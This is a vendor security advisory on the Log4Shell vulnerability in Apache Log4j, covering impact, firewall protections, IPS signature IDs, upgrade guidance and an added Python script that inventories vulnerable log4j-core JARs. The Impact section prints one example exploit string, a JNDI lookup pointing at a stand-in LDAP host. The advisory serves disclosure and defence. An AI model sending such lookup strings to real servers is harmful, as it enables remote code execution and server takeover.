Guard against Log4Shell
What Is the Vulnerable Log4j Package?
Log4j is an open-source project that is widely used for logging in Java. A remote code injection vulnerability was found in Log4j versions between 2.x.x and 2.14.x. (A further Log4j vulnerability, CVE-2021-45046, was also found in 2.15, so we recommend updating to version 2.17.) It allows attackers to send a specially crafted command and easily obtain a remote shell (Log4Shell).
Impact
This vulnerability received the highest CVSS score (10) because the log4j package is widely used and the vulnerability can be exploited remotely. If the server is vulnerable, attackers can send commands (such as ${jndi:ldap://example.com/a}) to the log4j package and get a shell to take over the server. Once the host is compromised, it could be used as a bot or a miner, or your important files could be encrypted by ransomware.
Zyxel Security Appliances Against Log4Shell
Zyxel is aware of remote code execution (RCE) vulnerabilities in Apache Log4j and confirms that all its security products are NOT affected [1]. Zyxel ATP/USG FLEX/USG Series firewalls provide multi-layer protection to help you defend against the attack.
Mitigation
1. On host: Update to the latest version of Apache Log4j (>=2.17.0).
2. On network:
- To reduce the attack surface, don't publish vulnerable applications to the Internet unless it is absolutely necessary. Use VPN technology for remote access to the applications.
- Update to the latest IPS signature version and then enable the IPS function to protect your host. If your host uses SSL/TLS transmission, you should also enable SSL inspection for further detection. When the attack comes from a malicious IP address, the IP reputation feature defends you against attacks from that IP address.
- Enabling the DNS filter, URL filter, Content Filter, AntiVirus and Sandbox features can also break the attack chain and prevent further infection.
Please refer to the signature information:
ATP/USG FLEX/USG series:
v4.0.x.20211217.0
# Signature ID 131026, 131027 and 131028 are used for CVE-2021-44228.
# Signature ID 131029 and 131030 are used for CVE-2021-45046.
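To support the on-host mitigation above, the following added example (not Zyxel's or Apache's code) inventories log4j-core JARs under a directory and applies the version ranges stated in this advisory. The function names and status strings are hypothetical. It assumes the JAR keeps its standard Maven metadata or file name, and it does not model Apache's backport releases for older Java runtimes.

```python
import re
import sys
import zipfile
from pathlib import Path

# Maven metadata entry carried inside log4j-core JARs; survives a file rename.
POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
VER_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")

def classify(version):
    """Apply this advisory's version ranges to a (major, minor, patch) tuple.
    Assumption: Apache's backport releases for older Java are not modelled."""
    if version[0] != 2:
        return "not 2.x: outside this advisory"
    if version >= (2, 17, 0):
        return "ok: >= 2.17.0"
    if version >= (2, 16, 0):
        return "update: below 2.17.0"
    if version >= (2, 15, 0):
        return "affected: CVE-2021-45046"
    return "affected: CVE-2021-44228"

def jar_version(path):
    """Return the log4j-core version of a JAR as a tuple, or None if not log4j-core."""
    path, found = Path(path), None
    try:
        with zipfile.ZipFile(path) as jar:
            if POM in jar.namelist():
                props = jar.read(POM).decode("utf-8", "replace")
                m = re.search(r"^version=(\S+)", props, re.M)
                found = m.group(1) if m else None
    except (zipfile.BadZipFile, OSError):
        pass  # unreadable archive: fall back to the file name below
    if found is None:
        m = re.match(r"log4j-core-(\S+)\.jar$", path.name)
        found = m.group(1) if m else None
    m = VER_RE.match(found or "")
    return tuple(int(g or 0) for g in m.groups()) if m else None

def scan(root):
    """Return (path, version, status) per log4j-core JAR under root (nested JARs not opened)."""
    found = ((str(p), jar_version(p)) for p in sorted(Path(root).rglob("*.jar")))
    return [(p, v, classify(v)) for p, v in found if v]

if __name__ == "__main__":
    for path, version, status in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{status:32} {'.'.join(map(str, version))}  {path}")
```

Run it with the application directory as the only argument. JARs bundled inside fat JARs or WAR files need to be unpacked first, since nested archives are not opened.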
Reference
[1] Zyxel security advisory for Apache Log4j RCE vulnerabilities, https://www.zyxel.com/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml
Revision history
2021-12-17: Initial release